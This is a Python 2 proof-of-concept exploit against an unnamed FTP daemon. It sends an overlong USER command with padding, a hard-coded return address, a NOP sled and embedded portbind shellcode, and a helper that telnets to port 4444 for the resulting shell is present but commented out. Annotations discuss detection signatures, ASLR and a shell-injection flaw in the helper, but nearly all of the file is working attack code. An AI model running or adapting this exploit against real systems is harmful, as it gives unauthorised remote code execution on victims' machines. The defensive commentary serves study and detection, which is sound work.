  1. import os
  2. import sys
  3. import time
  4. import socket
  5. import struct
  6.  
# Binary payload appended to the oversized USER command in ExploitFTP().
# The original label calls it "alphanumeric portbind shellcode from
# metasploit", but the bytes are almost entirely non-printable, so this is
# not an alphanumeric encoding and the label is probably stale.  "portbind"
# suggests it opens a listening port on the target -- presumably TCP 4444,
# which is what ConnectRemoteShell() dials -- but nothing on this page
# confirms that; treat the string as opaque.
# NOTE(review): the leading bytes \xd9\xcc\xd9\x74\x24\xf4 look like an
# FPU/fnstenv-based GetPC stub of the kind Metasploit encoders emit; that
# prefix is a common IDS/AV signature for such payloads -- confirm before
# relying on it for detection.
shellcode=("\xd9\xcc\xd9\x74\x24\xf4\xbe\xad\xc6\xaf\xd3\x5a\x31\xc9\xb1"
"\x46\x31\x72\x17\x83\xea\xfc\x03\xdf\xd5\x4d\x26\xe3\x32\x18"
"\xc9\x1b\xc3\x7b\x43\xfe\xf2\xa9\x37\x8b\xa7\x7d\x33\xd9\x4b"
"\xf5\x11\xc9\xd8\x7b\xbe\xfe\x69\x31\x98\x31\x69\xf7\x24\x9d"
"\xa9\x99\xd8\xdf\xfd\x79\xe0\x10\xf0\x78\x25\x4c\xfb\x29\xfe"
"\x1b\xae\xdd\x8b\x59\x73\xdf\x5b\xd6\xcb\xa7\xde\x28\xbf\x1d"
"\xe0\x78\x10\x29\xaa\x60\x1a\x75\x0b\x91\xcf\x65\x77\xd8\x64"
"\x5d\x03\xdb\xac\xaf\xec\xea\x90\x7c\xd3\xc3\x1c\x7c\x13\xe3"
"\xfe\x0b\x6f\x10\x82\x0b\xb4\x6b\x58\x99\x29\xcb\x2b\x39\x8a"
"\xea\xf8\xdc\x59\xe0\xb5\xab\x06\xe4\x48\x7f\x3d\x10\xc0\x7e"
"\x92\x91\x92\xa4\x36\xfa\x41\xc4\x6f\xa6\x24\xf9\x70\x0e\x98"
"\x5f\xfa\xbc\xcd\xe6\xa1\xaa\x10\x6a\xdc\x93\x13\x74\xdf\xb3"
"\x7b\x45\x54\x5c\xfb\x5a\xbf\x19\xf3\x10\xe2\x0b\x9c\xfc\x76"
"\x0e\xc1\xfe\xac\x4c\xfc\x7c\x45\x2c\xfb\x9d\x2c\x29\x47\x1a"
"\xdc\x43\xd8\xcf\xe2\xf0\xd9\xc5\x80\x9b\x41\xc8\x23\x1b\xef"
"\x34\x83\xb8\xcf\x5a\xbe\x4a\x30\xd6\x33\xd7\x42\x38\xc4\x65"
"\xd6\x5d\x46\xe8\x38\xee\xf4\x9f\x5d\x6c\x98\x7f\xb1\x31\x1e"
"\x3b\xed\x97\xb8\xe3\x83\xb2\xb0\xc3\x37\x52\x5a\x62\xa4\xcb"
"\xee\x0b\x41\x64\x2f\x92\xcd\xe9\x46\x7a\x67\x81\xec\xf0\x16"
"\x11\x62\x86\xab\xf9\x0c\x14\x39\x9f\x8e\xb9\xe1\x70\x0e\x7d"
"\xa6\x8e\x9a")
  29.  
def ConnectRemoteShell(target):
       # Dials TCP 4444 on `target` with the system telnet client, i.e. a
       # cleartext session to the listener the payload is expected to open.
       # Only referenced from the commented-out call at the bottom of the
       # file, so it is dead code as pasted.
       # The command line is built by string concatenation and handed to a
       # shell via os.system(), so `target` (taken verbatim from argv[1]) is
       # interpreted unescaped by that shell.  From a monitoring standpoint,
       # an outbound telnet to port 4444 right after an FTP session is an
       # obvious correlation point.
       connect = "/usr/bin/telnet " + target + " 4444"
       os.system(connect)
  33.  
def ExploitFTP(target):
       # Proof-of-concept stack overflow against an FTP service on port 21:
       # one oversized USER command carrying a return address and the
       # payload above.  The page does not name the vulnerable daemon or
       # version, so which product this was written for cannot be stated here.
       sockAddr = (target, 21)
       tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       # No error handling: a refused or timed-out connect() propagates as an
       # uncaught socket.error and aborts the script.
       tsock.connect(sockAddr)
       # The banner is read only to drain it; its content is never examined.
       response = tsock.recv(1024)

       # At the time of overflow EBP points to our shellcode
       payload = "USER "
       payload += "A" * 485
       # Point of EIP overwrite. Address of 'call ebp' from user32.dll SP4.
       # NOTE(review): a hard-coded absolute address from one specific DLL
       # build -- the exploit is valid only for that exact build, and a fixed
       # address like this is precisely what ASLR is meant to defeat.
       payload += struct.pack("<L",0x7C874413 )
       payload += "\x90" * 100
       payload += shellcode
       payload += "\r\n"
       # Defender view: a USER argument several hundred bytes long, mostly
       # 0x41 followed by non-printable bytes, is a trivial IDS signature;
       # the server-side fix is bounds-checking the USER argument.  The
       # socket is sent once and never closed or read again.
       tsock.send(payload)
  49.  
if __name__ == '__main__':
       # Entry point.  Python 2 syntax (print statement below).  The single
       # positional argument is the target host; it is checked only for
       # presence, never for shape, and is passed straight through.
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <target>' % sys.argv[0]
               # -1 is not a valid POSIX exit status; the shell will see it
               # wrapped (typically 255).
               sys.exit(-1)

       ExploitFTP(target)
       # Fixed pause before the (disabled) shell connection -- presumably to
       # give the payload time to start listening; nothing checks that it did.
       time.sleep(2)
#      ConnectRemoteShell(target)